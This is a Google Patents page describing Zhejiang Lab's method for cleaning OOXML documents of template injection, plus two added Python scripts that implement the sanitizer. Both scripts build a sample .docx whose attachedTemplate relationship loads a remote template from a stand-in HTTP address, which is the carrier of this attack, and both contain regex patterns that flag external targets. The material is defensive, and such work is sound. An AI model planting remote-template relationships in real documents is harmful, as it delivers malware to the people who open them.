CN117235716B - Unknown threat defense method and device for OOXML document template injection attack - Google Patents


Info

Publication number
CN117235716B
Authority
CN
China
Prior art keywords
threat
file
ooxml
xml
matching
Prior art date
Legal status
Active
Application number
CN202311508777.4A
Other languages
Chinese (zh)
Other versions
CN117235716A (en)
Inventor
张汝云
白冰
孙天宁
张奕鹏
徐昊天
孙才俊
Current Assignee
Zhejiang Lab
Original Assignee
Zhejiang Lab
Priority date
Filing date
Publication date
Application filed by Zhejiang Lab
Priority to CN202311508777.4A
Publication of CN117235716A
Application granted
Publication of CN117235716B
Legal status: Active
Anticipated expiration


Abstract

The invention discloses an unknown-threat defense method and device for OOXML document template injection attacks. The document is unpacked, the XML trees of the component files that could store a malicious payload are parsed again recursively, and the tags that could carry a malicious payload are analyzed, scored, and deleted or rewritten according to a preset credibility dictionary and scoring algorithm. A malicious document built by an attacker is thereby broken and loses its ability to attack, so the user is to a large extent protected from the file template injection attacks of a phishing attacker. The invention breaks the stalemate in which traditional antivirus software can only detect and provides a new defense scheme: its protection against malicious documents is generic, normal use of the documents by users is essentially unaffected, and in theory it can block all known template injection attacks as well as variant attacks, n-day vulnerabilities, 0-day vulnerabilities and similar attack techniques.

Description

Unknown threat defense method and device for OOXML document template injection attack
Technical Field
The invention relates to the technical field of computer security, in particular to an unknown-threat defense method and device for OOXML document template injection attacks.
Background
In the prior art, static detection cannot cope effectively with unknown threats such as 0-day vulnerabilities, and signature database updates lag considerably; dynamic detection can be bypassed by dynamic evasion (anti-sandbox) techniques, the malicious payload only runs when its runtime conditions are met, which are hard to anticipate, and dynamic detection consumes system resources, slows execution and degrades the user experience.
The invention therefore departs from the traditional approach and starts from the content format of the data file: the file is cleaned according to preset credibility rules, so that the threat is reduced to a minimum before the file is ever opened. The presets are flexible, and user-defined credibility rules can shift the emphasis between availability and security; under the strictest credibility settings, 0-day attacks and other unknown threats of all template injection types can in theory be blocked. Known threats are cleaned without opening the unknown file, so the malicious payload never obtains execution while the file is being cleaned, which avoids the drawbacks of dynamic monitoring.
Disclosure of Invention
The invention aims to provide an unknown-threat defense method and device for OOXML document template injection attacks that address the defects of the prior art, so that a user can reduce the risk of a template injection attack in a document without opening the file.
In order to achieve the above object, the present invention provides an unknown-threat defense method for an OOXML document template injection attack, comprising the following steps:
(1) Acquiring an OOXML document to be processed, and initializing a threat map and a credibility dictionary;
(2) Judging whether the OOXML document to be processed is encrypted; if so, first removing the password through the user or a computer program, then decompressing and unpacking the OOXML document with the compression algorithm to obtain the component files; otherwise, decompressing and unpacking the OOXML document directly with the compression algorithm to obtain the component files;
(3) Performing structure identification on the component files to determine which threat map they belong to; traversing the component files according to the preset threat map, and storing the files that match it and are not fully trusted in a list variable;
(4) Checking the availability of the files in the list variable against the XML format standard, and removing unusable data such as unclosed or abnormal symbol tags from the files;
(5) Assigning an initial credibility score to each XML tag in the file by analyzing its tag name against the preset credibility dictionary; matching the tag value corresponding to the XML tag name against the matching rules, assigning a tag threat score according to the number and length of matches, and finally obtaining the threat score;
(6) Judging whether the threat score obtained in step (5) is below a threshold; if so, clearing the threat from the XML tag in the file, that is, deleting the whole XML tag or modifying its tag value; otherwise, proceeding to step (8);
(7) Performing a second verification, repeating steps (5) and (6) until the threat score in step (6) is greater than or equal to the threshold;
(8) Repacking and compressing all processed component files with the compression algorithm and restoring the OOXML file; the resulting OOXML file is the file with the malicious payload cleaned.
Further, in step (1), the threat map is a blacklist: the named files that may carry an attack payload are stored as a list. The threat map holds the credibility dictionaries used for the different formats and is initialized according to the format of the OOXML document to be processed. The credibility dictionary defines the set of tags that may pose a threat risk; for each tag in the set it defines an initial credibility score, a matching rule for the tag value, and a scoring criterion based on match length or number of matches.
Further, in step (2), the compression algorithm is the one specified by the ECMA-376 Office Open XML format standard.
Further, in step (3), the structure identification of the component files comprises structure recognition and name recognition.
Further, in step (5), the matching rules comprise regular expression matching and string matching.
Further, in step (5), the threat score of an XML tag is obtained by adding the tag's initial credibility score and its tag threat score.
Further, the threshold is greater than or equal to 60.
In order to achieve the above object, the present invention also provides an unknown-threat defense device for an OOXML document template injection attack, which includes one or more processors configured to implement the above unknown-threat defense method for an OOXML document template injection attack.
To achieve the above object, the present invention also provides an electronic device including a memory and a processor, the memory being coupled to the processor; the memory stores program data, and the processor executes the program data to implement the above unknown-threat defense method for an OOXML document template injection attack.
To achieve the above object, the present invention further provides a computer-readable storage medium storing a computer program which, when executed by a processor, implements the above unknown-threat defense method for an OOXML document template injection attack.
Compared with the prior art, the invention has the beneficial effects that:
1. Unlike traditional detection techniques based on dynamic and static analysis of files, the method clears attack payloads: the malicious payloads in input files are destroyed uniformly, which proactively removes the possibility of the attack succeeding and avoids the defect that traditional antivirus software can only detect and therefore misses samples.
2. Unlike traditional dynamic detection, the method does not need to open the document, and disassembling and processing the document cannot trigger the malicious attack.
3. The invention breaks the stalemate in which traditional antivirus software can only detect and provides a new defense scheme: its protection against malicious documents is generic, normal use of the documents by users is essentially unaffected, and in theory it can block all known template injection attacks as well as variant attacks, n-day vulnerabilities, 0-day vulnerabilities and similar attack techniques.
Drawings
In order to more clearly illustrate the technical solutions of the embodiments of the present invention, the drawings that are needed in the description of the embodiments will be briefly described below, it being obvious that the drawings in the following description are only some embodiments of the present invention, and that other drawings may be obtained according to these drawings without inventive effort to a person skilled in the art.
FIG. 1 is a schematic flow chart of the method of the present invention;
FIG. 2 is a schematic diagram of a label threat scoring process in accordance with the present invention;
FIG. 3 is a schematic diagram of a threat map configuration file according to the present invention;
FIG. 4 is a schematic diagram of an attack load of the template injection attack document according to the present invention;
FIG. 5 is a schematic view of the structure of the device of the present invention;
FIG. 6 is a schematic diagram of an electronic device.
Detailed Description
Reference will now be made in detail to exemplary embodiments, examples of which are illustrated in the accompanying drawings. When the following description refers to the accompanying drawings, the same numbers in different drawings refer to the same or similar elements, unless otherwise indicated. The implementations described in the following exemplary examples do not represent all implementations consistent with the invention. Rather, they are merely examples of apparatus and methods consistent with aspects of the invention as detailed in the accompanying claims.
The terminology used herein is for the purpose of describing particular embodiments only and is not intended to be limiting of the invention. As used in this specification and the appended claims, the singular forms "a," "an," and "the" are intended to include the plural forms as well, unless the context clearly indicates otherwise. It should also be understood that the term "and/or" as used herein refers to and encompasses any or all possible combinations of one or more of the associated listed items.
It should be understood that although the terms first, second, third, etc. may be used herein to describe various information, these information should not be limited by these terms. These terms are only used to distinguish one type of information from another. For example, first information may also be referred to as second information, and similarly, second information may also be referred to as first information, without departing from the scope of the invention. The word "if" as used herein may be interpreted as "at … …" or "at … …" or "responsive to a determination", depending on the context.
The present invention will be described in further detail with reference to the accompanying drawings and examples. It should be understood that the present invention may be embodied in many different forms and should not be construed as limited to the embodiments set forth herein. Rather, these embodiments are provided so that this disclosure will be thorough and complete, and will fully convey the scope of the invention to those skilled in the art. In addition, the technical features of the embodiments described below may be combined with each other as long as they do not collide with each other.
The unknown-threat defense method and device for OOXML document template injection attacks provided by the invention reduce the risk of a template injection attack in a document without the user opening the document.
Referring to FIG. 1, the unknown-threat defense method for an OOXML document template injection attack provided by the invention comprises the following steps:
Step one: acquire an OOXML document to be processed, and initialize a threat map and a credibility dictionary.
Specifically, a custom configuration file is read. Each file type has its own credibility dictionary, and each dictionary holds, for the tags that may occur, different matching rules and the corresponding tag threat score calculation rules. The threat map and the credibility dictionary are then initialized. The threat map (thread_map) is a blacklist that stores, as a list, the named files that may carry an attack payload, so that they can be traversed and cleaned; the threat map holds the specific dictionaries (the credibility dictionaries) used for each format, and can be initialized to different contents depending on the format of the OOXML document to be processed. The credibility dictionary (thread_subject) defines the set of tags that may pose a threat risk; each tag in it defines its initial credibility score, then the matching rules for its tag value (regular expressions, string matching and so on), and a scoring criterion based on match length or number of matches. Special threat handling rules are also set: for certain tags the degree of maliciousness cannot be evaluated by accumulating a score, so a specific cleaning action is specified for them, for example removing the tag outright without scoring it; the processing logic of the cleaning body is not limited to any particular operation.
Step two: judging whether the OOXML document to be processed is an encrypted document or not; if yes, firstly, the password is released through a user or a computer program, and then the OOXML document to be processed is compressed and restored through a compression algorithm, so that various component files are obtained; otherwise, compressing and restoring the OOXML document to be processed directly through a compression algorithm to obtain various component files.
Specifically, the to-be-processed OOXML document is compressed and restored through the compression algorithm specified by the ECMA-376 Office Open XML format standard so as to facilitate subsequent processing, and the volume of the document can be effectively reduced by adopting the compression algorithm specified by the ECMA-376 Office Open XML format standard without any data loss. In the restore process, the file will be decompressed and restored into various types of component files, such as: in the file structure of the restored PowerPoint document, the files contained in the PPT file/PPT/_slides/_rels directory are one of the paths for storing remote templates, and because the format standard of OOXML prescribes that the component files are stored in the produced folders according to the specific folder structure. However, some input files may not be restored normally, and the files which cannot be restored normally may be discarded and recorded in the log for subsequent investigation and processing due to damage of the files themselves, non-compliance of the compression algorithm or lack of necessary identification information. In addition, for documents with cryptographic encryption, normal restoration at this step is also not possible. This is because Word or the like OOXML documents themselves provide cryptographic protection and require decryption before decompression. Therefore, the documents with the password encryption can be automatically decrypted by a user or by a computer program, and the OOXML documents to be processed are compressed and restored by a compression algorithm specified by the ECMA-376 Office Open XML format standard after decryption.
Step three: perform structure identification on the component files, determine which threat map they belong to, traverse the component files, and store the files that match the preset threat map and are not fully trusted in a list variable.
Specifically, the structure of each type of unpacked component file (Word, Excel, PowerPoint) is identified. Because the structure tree of each file type differs, as specified in the ECMA-376 Office Open XML format standard, the threat map to which the unpacked component files belong must be determined from their structure and names. All files produced in step two are traversed against the preset threat map, and the files that match an entry in the threat map are stored in a list variable for traversal in steps four and five.
Step four: check the availability of the files in the list variable against the XML format standard, and remove unusable data such as unclosed or abnormal symbol tags from the files.
Specifically, the availability of the file is checked against the XML format standard and unusable data such as unclosed or abnormal symbol tags are removed. Checking the availability and integrity of the content before it is fed to scoring reduces the chance that an unknown attack form triggers an exception in the processing module.
Step five: assign an initial credibility score to each XML tag in the file by analyzing its tag name against the preset credibility dictionary; match the tag value corresponding to the XML tag name against the regular expression and string matching rules, assign a tag threat score according to the number and length of matches under each rule, and finally obtain the threat score.
Specifically, the XML tag names and tag values in the file are compared against the preset credibility dictionary, and the overall threat score of each tag is given according to the different calculation rules. Once the file is read in, each tag is assigned an initial credibility score by looking up its name in the credibility dictionary; the score lies in the interval [0, 100]. The tag value is then matched against the regular expression, string and other matching rules, and a tag threat score is given according to the number and length of the matches under each rule; for example, a rule based on hit count computes tag threat score = number of hits × risk multiplier × score basis. The final score of the tag (the threat score) is obtained by summing the initial credibility score and the tag threat score.
Step six: judge whether the threat score obtained in step five is below a threshold; if so, clear the threat from the XML tag in the file, that is, delete the whole XML tag or modify its tag value; otherwise, go to step eight.
Specifically, according to the threat score given in step five, the whole tag is deleted or the tag value of the XML tag in the file content is modified. As shown in FIG. 4, in the XML file responsible for storing templates each Relationship tag carries three attributes: Target (path), Type (type) and Id (sequence). The Type attribute records the type of the template, the Id attribute records the sequence of the template in the document, and the Target attribute records the path of the template. This step reads the threat clearing threshold from the preset configuration; a higher threshold means a lower tolerance for threats, and a lower threshold means a stronger emphasis on usability. For example, with the threshold set to 60 or higher, every tag whose score after threat assessment is below 60 is judged to be at risk of template injection attack, and in this step its tag value is cleared or the whole tag is removed, which defeats the unknown attack. For example, "document templates and add-ins" are in most cases too specialized: ordinary users hardly ever use them, much as with VBA macros, yet they are the mainstream technique of current template injection attacks and therefore carry an extremely high risk. The remote template tags matched in step five are given very low scores in this scenario and deleted in this step, which effectively invalidates the attack.
Step seven: perform a second verification, repeating step five and step six until the threat score in step six is greater than or equal to the threshold.
Specifically, if content was deleted or modified in step six (that is, if any tag scored below the security threshold), a second verification is performed: the method returns to step five and repeats the risk scoring and payload cleaning steps until the threat cleaning module considers the input content sufficiently secure, that is, a pass produces a result with no cleaning at all, and proceeds to the next step in a fully trusted state. The purpose of this step is to defend against common attacker evasion techniques such as writing the payload twice (double-write bypass).
The second verification includes: comparing the file input with the output for consistency, to evaluate security and decide whether threat clearing is needed again; and reusing the threat scoring of step five and the threat clearing of step six on the output file, which may still carry risk after cleaning, thereby countering common attacker evasions such as double-written attack payloads.
Step eight: repack and compress all processed files with the compression algorithm, restore the OOXML file so that the user can open the processed file directly in ordinary Office software, and restore the original file suffix; the resulting file is the file with the malicious payload cleaned.
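The following Python script is an added, self-contained illustration of steps one to eight as described above; it is written for this page and is not the patent's own implementation. It builds a constructed skeleton .docx whose word/_rels/settings.xml.rels carries an attachedTemplate relationship with an external HTTP target (the FIG. 4 pattern) next to a harmless styles relationship, then detects password protection by the CFB container magic, identifies the format from part names, walks a threat map, checks each listed part for well-formedness, scores every Relationship tag, removes tags below the threshold, repeats until a pass removes nothing, and repacks the archive. The threat map entries, the credibility dictionary, the scores (initial 80, threshold 60, risk multiples and score bases), and the treatment of the tag threat score as a deduction from the initial credibility score (the only reading under which a low score means "clear the tag") are assumptions; the attachedTemplate relationship type URI and the CFB magic are standard values.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # CFB header: a password-protected OOXML package
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
ET.register_namespace("", RELS_NS)                # keep the default namespace when re-serialising

# Step 1 (assumed contents). Threat map: blacklist of part names per format.
THREAT_MAP = {
    "docx": [re.compile(r"^word/_rels/.*\.rels$")],
    "pptx": [re.compile(r"^ppt/slides/_rels/.*\.rels$")],
    "xlsx": [re.compile(r"^xl/_rels/.*\.rels$")],
}
# Credibility dictionary: per tag an initial score and (attribute, regex, risk multiple, score basis).
CREDIBILITY = {
    "Relationship": {
        "initial": 80,
        "rules": [
            ("Type", re.compile(r"/attachedTemplate$"), 3, 20),
            ("Target", re.compile(r"^(?:https?|file)://|^\\\\", re.I), 1, 15),
        ],
    },
}
THRESHOLD = 60
FORMAT_MARKERS = {"word/document.xml": "docx", "ppt/presentation.xml": "pptx", "xl/workbook.xml": "xlsx"}


def is_encrypted(data: bytes) -> bool:
    """Step 2: a package starting with the CFB magic is password-protected; decrypt it first."""
    return data.startswith(OLE_MAGIC)


def detect_format(names) -> str:
    """Step 3: structure and name recognition of the unzipped parts."""
    for marker, fmt in FORMAT_MARKERS.items():
        if marker in names:
            return fmt
    raise ValueError("not a recognised OOXML package")


def score_tag(elem) -> int:
    """Step 5 (assumed direction): initial credibility minus hits * risk multiple * score basis."""
    entry = CREDIBILITY.get(elem.tag.split("}")[-1])
    if entry is None:
        return 100                                 # tags outside the dictionary are fully trusted
    score = entry["initial"]
    for attr, pattern, risk, basis in entry["rules"]:
        score -= len(pattern.findall(elem.get(attr, ""))) * risk * basis
    return score


def clean_part(xml_bytes: bytes):
    """Steps 4-7 on one part: check well-formedness, score, drop tags below the threshold,
    and repeat until a pass removes nothing (so a twice-written payload is also caught)."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        # Step 4: unusable data; an empty relationships part keeps the package openable.
        return b'<Relationships xmlns="%s"/>' % RELS_NS.encode(), ["unparseable part replaced"]
    removed = []
    while True:
        victims = [(p, c) for p in root.iter() for c in list(p) if score_tag(c) < THRESHOLD]
        if not victims:
            break
        for parent, child in victims:
            removed.append((child.get("Id"), child.get("Target"), score_tag(child)))
            parent.remove(child)
    return ET.tostring(root, encoding="utf-8", xml_declaration=True), removed


def sanitize(data: bytes):
    """Whole pipeline; returns (cleaned package bytes, log of removed relationships)."""
    if is_encrypted(data):
        raise ValueError("encrypted package: decrypt before sanitising")
    src = zipfile.ZipFile(io.BytesIO(data))
    patterns = THREAT_MAP[detect_format(src.namelist())]
    out, log = io.BytesIO(), []
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:   # Step 8: repack
        for name in src.namelist():                # keep part order ([Content_Types].xml first)
            body = src.read(name)
            if any(p.match(name) for p in patterns):
                body, removed = clean_part(body)
                log.extend((name, *r) for r in removed)
            dst.writestr(name, body)
    return out.getvalue(), log


def read_part(package: bytes, name: str) -> bytes:
    return zipfile.ZipFile(io.BytesIO(package)).read(name)


def build_sample() -> bytes:
    """Constructed input: skeleton .docx whose settings.xml.rels points at a remote template."""
    rels = (
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        'Target="http://198.51.100.7/t.dotm" TargetMode="External"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
        'relationships/styles" Target="styles.xml"/></Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    cleaned, log = sanitize(build_sample())
    print("removed:", log)
    print(read_part(cleaned, "word/_rels/settings.xml.rels").decode())
```

Running the script removes rId1 (score 80 - 1×3×20 - 1×1×15 = 5, below the threshold of 60) and keeps the internal styles relationship (score 80). Two points a practitioner should carry over from the patent text into any real deployment: the relationships part is rewritten rather than deleted, so the document still opens, and the loop in clean_part only terminates when a full pass removes nothing, which is the "second verification" of step seven.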
Corresponding to the embodiment of the unknown-threat defense method for an OOXML document template injection attack, the invention also provides an embodiment of an unknown-threat defense device for an OOXML document template injection attack.
Referring to FIG. 5, the unknown-threat defense device for an OOXML document template injection attack provided by the embodiment of the invention includes one or more processors configured to implement the unknown-threat defense method for an OOXML document template injection attack of the above embodiment.
The embodiment of the unknown-threat defense device for an OOXML document template injection attack can be applied to any device with data processing capability, such as a computer. The device embodiment may be implemented by software, by hardware, or by a combination of the two. Taking software as an example, the device in the logical sense is formed when the processor of any device with data processing capability reads the corresponding computer program instructions from non-volatile memory into memory. In terms of hardware, FIG. 5 shows the hardware structure of a device with data processing capability on which the unknown-threat defense device of the invention is located; besides the processor, memory, network interface and non-volatile memory shown in FIG. 5, the device generally includes other hardware according to its actual function, which is not described here again.
The implementation process of the functions and roles of each unit in the above device is specifically shown in the implementation process of the corresponding steps in the above method, and will not be described herein again.
For the device embodiments, reference is made to the description of the method embodiments for the relevant points, since they essentially correspond to the method embodiments. The apparatus embodiments described above are merely illustrative, wherein the elements illustrated as separate elements may or may not be physically separate, and the elements shown as elements may or may not be physical elements, may be located in one place, or may be distributed over a plurality of network elements. Some or all of the modules may be selected according to actual needs to achieve the purposes of the present invention. Those of ordinary skill in the art will understand and implement the present invention without undue burden.
Corresponding to the embodiment of the unknown-threat defense method for an OOXML document template injection attack, the embodiment of the application further provides an electronic device, which includes one or more processors and a memory for storing one or more programs; when the one or more programs are executed by the one or more processors, the processors implement the unknown-threat defense method for an OOXML document template injection attack described above. FIG. 6 shows the hardware structure of a device with data processing capability on which the method provided by the embodiment of the application is located; besides the processor, memory, DMA controller, disk and non-volatile memory shown in FIG. 6, the device generally includes other hardware according to its actual function, which is not described here again.
Corresponding to the embodiment of the unknown-threat defense method for an OOXML document template injection attack, the embodiment of the invention further provides a computer-readable storage medium storing a program which, when executed by a processor, implements the unknown-threat defense method for an OOXML document template injection attack of the above embodiment.
The computer-readable storage medium may be an internal storage unit of any of the devices with data processing capability described in the preceding embodiments, such as a hard disk or memory. It may also be an external storage device of that device, for example a plug-in hard disk, a Smart Media Card (SMC), an SD card or a Flash card. Further, the computer-readable storage medium may include both the internal storage unit and the external storage device of the device. It is used to store the computer program and the other programs and data required by the device, and may also be used to temporarily store data that has been output or is to be output.
The foregoing description of the preferred embodiments of the invention is not intended to be limiting, but rather to enable any modification, equivalent replacement, improvement or the like to be made within the spirit and principles of the invention.
The above embodiments are merely for illustrating the design concept and features of the present invention, and are intended to enable those skilled in the art to understand the content of the present invention and implement the same, the scope of the present invention is not limited to the above embodiments. Therefore, all equivalent changes or modifications according to the principles and design ideas of the present invention are within the scope of the present invention.

Claims (8)

1. An unknown-threat defense method for an OOXML document template injection attack, characterized by comprising the following steps:
(1) Acquiring an OOXML document to be processed, and initializing a threat map and a credibility dictionary; the threat map is a blacklist in which the named files that may carry an attack payload are stored as a list; the threat map holds the credibility dictionaries used for the different formats and is initialized according to the format of the OOXML document to be processed; the credibility dictionary defines a set of tags that may pose a threat risk, and each tag in the set defines an initial credibility score, a matching rule for its tag value, and a scoring criterion based on match length or number of matches;
(2) Judging whether the OOXML document to be processed is encrypted; if so, first removing the password through the user or a computer program, then decompressing and unpacking the OOXML document with the compression algorithm to obtain the component files; otherwise, decompressing and unpacking the OOXML document directly with the compression algorithm to obtain the component files;
(3) Performing structure identification on the component files to determine which threat map they belong to; traversing the component files according to the preset threat map, and storing the files that match it and are not fully trusted in a list variable;
(4) Checking the availability of the files in the list variable against the XML format standard, and removing unusable data such as unclosed or abnormal symbol tags from the files;
(5) Assigning an initial credibility score to each XML tag in the file by analyzing its tag name against the preset credibility dictionary; matching the tag value corresponding to the XML tag name against the matching rules, assigning a tag threat score according to the number and length of matches, and finally obtaining the threat score of the XML tag; the threat score of the XML tag is obtained by adding its initial credibility score and its tag threat score;
(6) Judging whether the threat score obtained in step (5) is below a threshold; if so, clearing the threat from the XML tags in the file, that is, deleting the XML tags whose threat score is below the threshold or modifying their tag values; otherwise, proceeding to step (8);
(7) Performing a second verification, repeating steps (5) and (6) until the threat score in step (6) is greater than or equal to the threshold;
(8) Repacking and compressing all processed component files with the compression algorithm and restoring the OOXML file; the resulting OOXML file is the file with the malicious payload cleaned.
2. The unknown threat defense method for OOXML document template injection attacks of claim 1, wherein in step (2), the compression algorithm is based on the ECMA-376 Office Open XML format standard.
3. The unknown threat defense method for OOXML document template injection attacks of claim 1, wherein in step (3), the structure identification of the various component files includes structure recognition and name recognition.
4. The unknown threat defense method for OOXML document template injection attacks of claim 1, wherein in said step (5), said matching rules comprise regular expression matching and string matching.
5. The unknown threat defense method for OOXML document template injection attacks of claim 1, wherein the threshold is greater than or equal to 60.
6. An unknown threat defense apparatus for an OOXML document template injection attack, comprising one or more processors configured to implement the unknown threat defense method for an OOXML document template injection attack of any of claims 1-5.
7. An electronic device comprising a memory and a processor, wherein the memory is coupled to the processor; the memory is configured to store program data, and the processor is configured to execute the program data to implement the unknown threat defense method for OOXML document template injection attacks of any of claims 1-5.
8. A computer readable storage medium having stored thereon a computer program, wherein the program when executed by a processor implements the unknown threat defense method of OOXML document template injection attacks of any of claims 1-5.
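The following is an added worked example of the sanitizing pipeline described in steps (1) to (8) of claim 1, together with the regular-expression matching of claim 4 and the threshold of claim 5. It is not the patent's code. The part names in the threat map, the initial score of 100, the per-attribute regexes and their penalties, the policy of replacing a non-well-formed part with an empty relationships part, and the sample document (with the documentation address 198.51.100.7) are all assumptions made for illustration. The example targets the usual carrier of a Word template injection: an `attachedTemplate` relationship in `word/_rels/settings.xml.rels` whose `Target` is external.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
ET.register_namespace("", REL_NS)  # keep .rels parts prefix-free when re-serialising

# Threat map in blacklist form (step (1)): parts that can hold a template reference.
# The part names per format are an assumption chosen for this example.
THREAT_MAP = {
    ".docx": ["word/_rels/settings.xml.rels", "word/_rels/document.xml.rels"],
    ".dotx": ["word/_rels/settings.xml.rels", "word/_rels/document.xml.rels"],
}

# Credibility dictionary: per tag name an initial score and, per attribute (the "tag value"),
# (regex, penalty) rules; the penalty is multiplied by the match count ("matching times").
# Scores and penalties are illustrative assumptions.
CREDIBILITY = {
    "Relationship": {
        "initial": 100,
        "rules": {
            "Type": [(re.compile(r"/attachedTemplate$"), 30)],
            "Target": [(re.compile(r"^(?:https?|ftp|file)://|^\\\\", re.IGNORECASE), 40)],
            "TargetMode": [(re.compile(r"^External$"), 30)],
        },
    },
}
THRESHOLD = 60  # claim 5: threshold >= 60; a tag scoring below it is cleared


def score_tag(elem):
    """Step (5): initial credibility minus rule penalties; None if the tag is not in the dictionary."""
    entry = CREDIBILITY.get(elem.tag.rsplit("}", 1)[-1])  # strip the {namespace} prefix
    if entry is None:
        return None
    score = entry["initial"]
    for attr, rules in entry["rules"].items():
        value = elem.get(attr)
        if value is not None:
            for pattern, penalty in rules:
                score -= penalty * len(pattern.findall(value))
    return score


def score_xml(fragment):
    """Score a single tag given as an XML string."""
    return score_tag(ET.fromstring(fragment))


def clean_part(xml_bytes):
    """Steps (4)-(7): parse, score every tag, delete tags below THRESHOLD, re-verify.
    Returns (cleaned_bytes, deleted_count); deleted_count is -1 for a part that was not well-formed."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        # Step (4): not usable XML (e.g. unclosed tags); replace with an empty, valid relationships part.
        empty = ET.Element("{%s}Relationships" % REL_NS)
        return ET.tostring(empty, encoding="UTF-8", xml_declaration=True), -1
    deleted = 0
    while True:  # step (7): repeat until nothing in the tree scores below the threshold
        suspects = [(parent, child) for parent in root.iter() for child in list(parent)
                    if (s := score_tag(child)) is not None and s < THRESHOLD]
        if not suspects:
            break
        for parent, child in suspects:
            parent.remove(child)
            deleted += 1
    return ET.tostring(root, encoding="UTF-8", xml_declaration=True), deleted


def sanitize(package, ext=".docx"):
    """Steps (2), (3), (8): unpack the ZIP package, clean the blacklisted parts, repack the rest as-is."""
    if not zipfile.is_zipfile(io.BytesIO(package)):
        # A password-protected OOXML file is an OLE compound file, not a ZIP: decrypt it first.
        raise ValueError("not a ZIP package (encrypted, or not OOXML)")
    report, out = {}, io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(package)) as zin, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zout:
        for info in zin.infolist():
            payload = zin.read(info.filename)
            if info.filename in THREAT_MAP.get(ext, ()):
                payload, report[info.filename] = clean_part(payload)
            zout.writestr(info.filename, payload)
    return out.getvalue(), report


def read_part(package, name):
    """Return one part of a package (to inspect the cleaned output)."""
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        return z.read(name)


def build_sample():
    """Constructed minimal .docx whose settings part points at a remote template (demo input only)."""
    w = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    parts = {
        "[Content_Types].xml": '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/></Types>',
        "word/document.xml": '<w:document xmlns:w="%s"><w:body><w:p/></w:body></w:document>' % w,
        "word/settings.xml": '<w:settings xmlns:w="%s" xmlns:r="%s"><w:attachedTemplate r:id="rId1"/>'
        '</w:settings>' % (w, OFFICE_REL),
        "word/_rels/document.xml.rels": '<Relationships xmlns="%s"><Relationship Id="rId1" '
        'Type="%s/settings" Target="settings.xml"/></Relationships>' % (REL_NS, OFFICE_REL),
        "word/_rels/settings.xml.rels": '<Relationships xmlns="%s"><Relationship Id="rId1" '
        'Type="%s/attachedTemplate" Target="http://198.51.100.7/invoice.dotm" TargetMode="External"/>'
        '</Relationships>' % (REL_NS, OFFICE_REL),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, xml in parts.items():
            z.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    cleaned, report = sanitize(build_sample())
    print(report)  # {'word/_rels/document.xml.rels': 0, 'word/_rels/settings.xml.rels': 1}
    print(read_part(cleaned, "word/_rels/settings.xml.rels").decode())
```

Two design points worth noting. The rules are keyed by attribute rather than applied to every value, because the `Type` attribute of every legitimate relationship also begins with `http://` and would otherwise be penalised; a local `attachedTemplate` (score 70) survives while an external one (score 0) is deleted. Deleting the relationship leaves the `r:id` reference in `word/settings.xml` dangling; the "modify the tag value" branch of step (6) (rewriting `Target` to a local path and dropping `TargetMode`), or an additional dictionary entry for `w:attachedTemplate`, would give a tidier result and should be tested against the target Office version. Other carriers of remote content (OLE object, frame and hyperlink relationships, external links in spreadsheets) need their own threat-map and dictionary entries.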
CN202311508777.4A 2023-11-14 2023-11-14 Unknown threat defense method and device for OOXML document template injection attack Active CN117235716B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202311508777.4A CN117235716B (en) 2023-11-14 2023-11-14 Unknown threat defense method and device for OOXML document template injection attack

Publications (2)

Publication Number Publication Date
CN117235716A CN117235716A (en) 2023-12-15
CN117235716B true CN117235716B (en) 2024-02-13

Family

ID=89086461

Country Status (1)

Country Link
CN (1) CN117235716B (en)

Citations (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN106789091A (en) * 2017-02-24 2017-05-31 中金金融认证中心有限公司 The implementation method and device of a kind of Open XML documents digital signature and sign test
CN107948163A (en) * 2017-11-29 2018-04-20 中科信息安全共性技术国家工程研究中心有限公司 A kind of XML injection loopholes detection and defence method
CN114117419A (en) * 2021-11-12 2022-03-01 苏州浪潮智能科技有限公司 Template injection attack detection method, device, equipment and storage medium
CN116015777A (en) * 2022-12-09 2023-04-25 杭州安恒信息技术股份有限公司 Document detection method, device, equipment and storage medium
CN116126349A (en) * 2023-04-18 2023-05-16 合肥高维数据技术有限公司 OOXML document entrainment detection method, storage medium and electronic device
CN116150765A (en) * 2023-02-28 2023-05-23 上海安般信息科技有限公司 Fuzzy variation method and device based on API (application program interface) dependence
CN116975865A (en) * 2023-08-11 2023-10-31 北京天融信网络安全技术有限公司 Malicious Office document detection method, device, equipment and storage medium

Family Cites Families (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20190385472A1 (en) * 2015-09-21 2019-12-19 Pearson Education, Inc. Assessment item generation and scoring
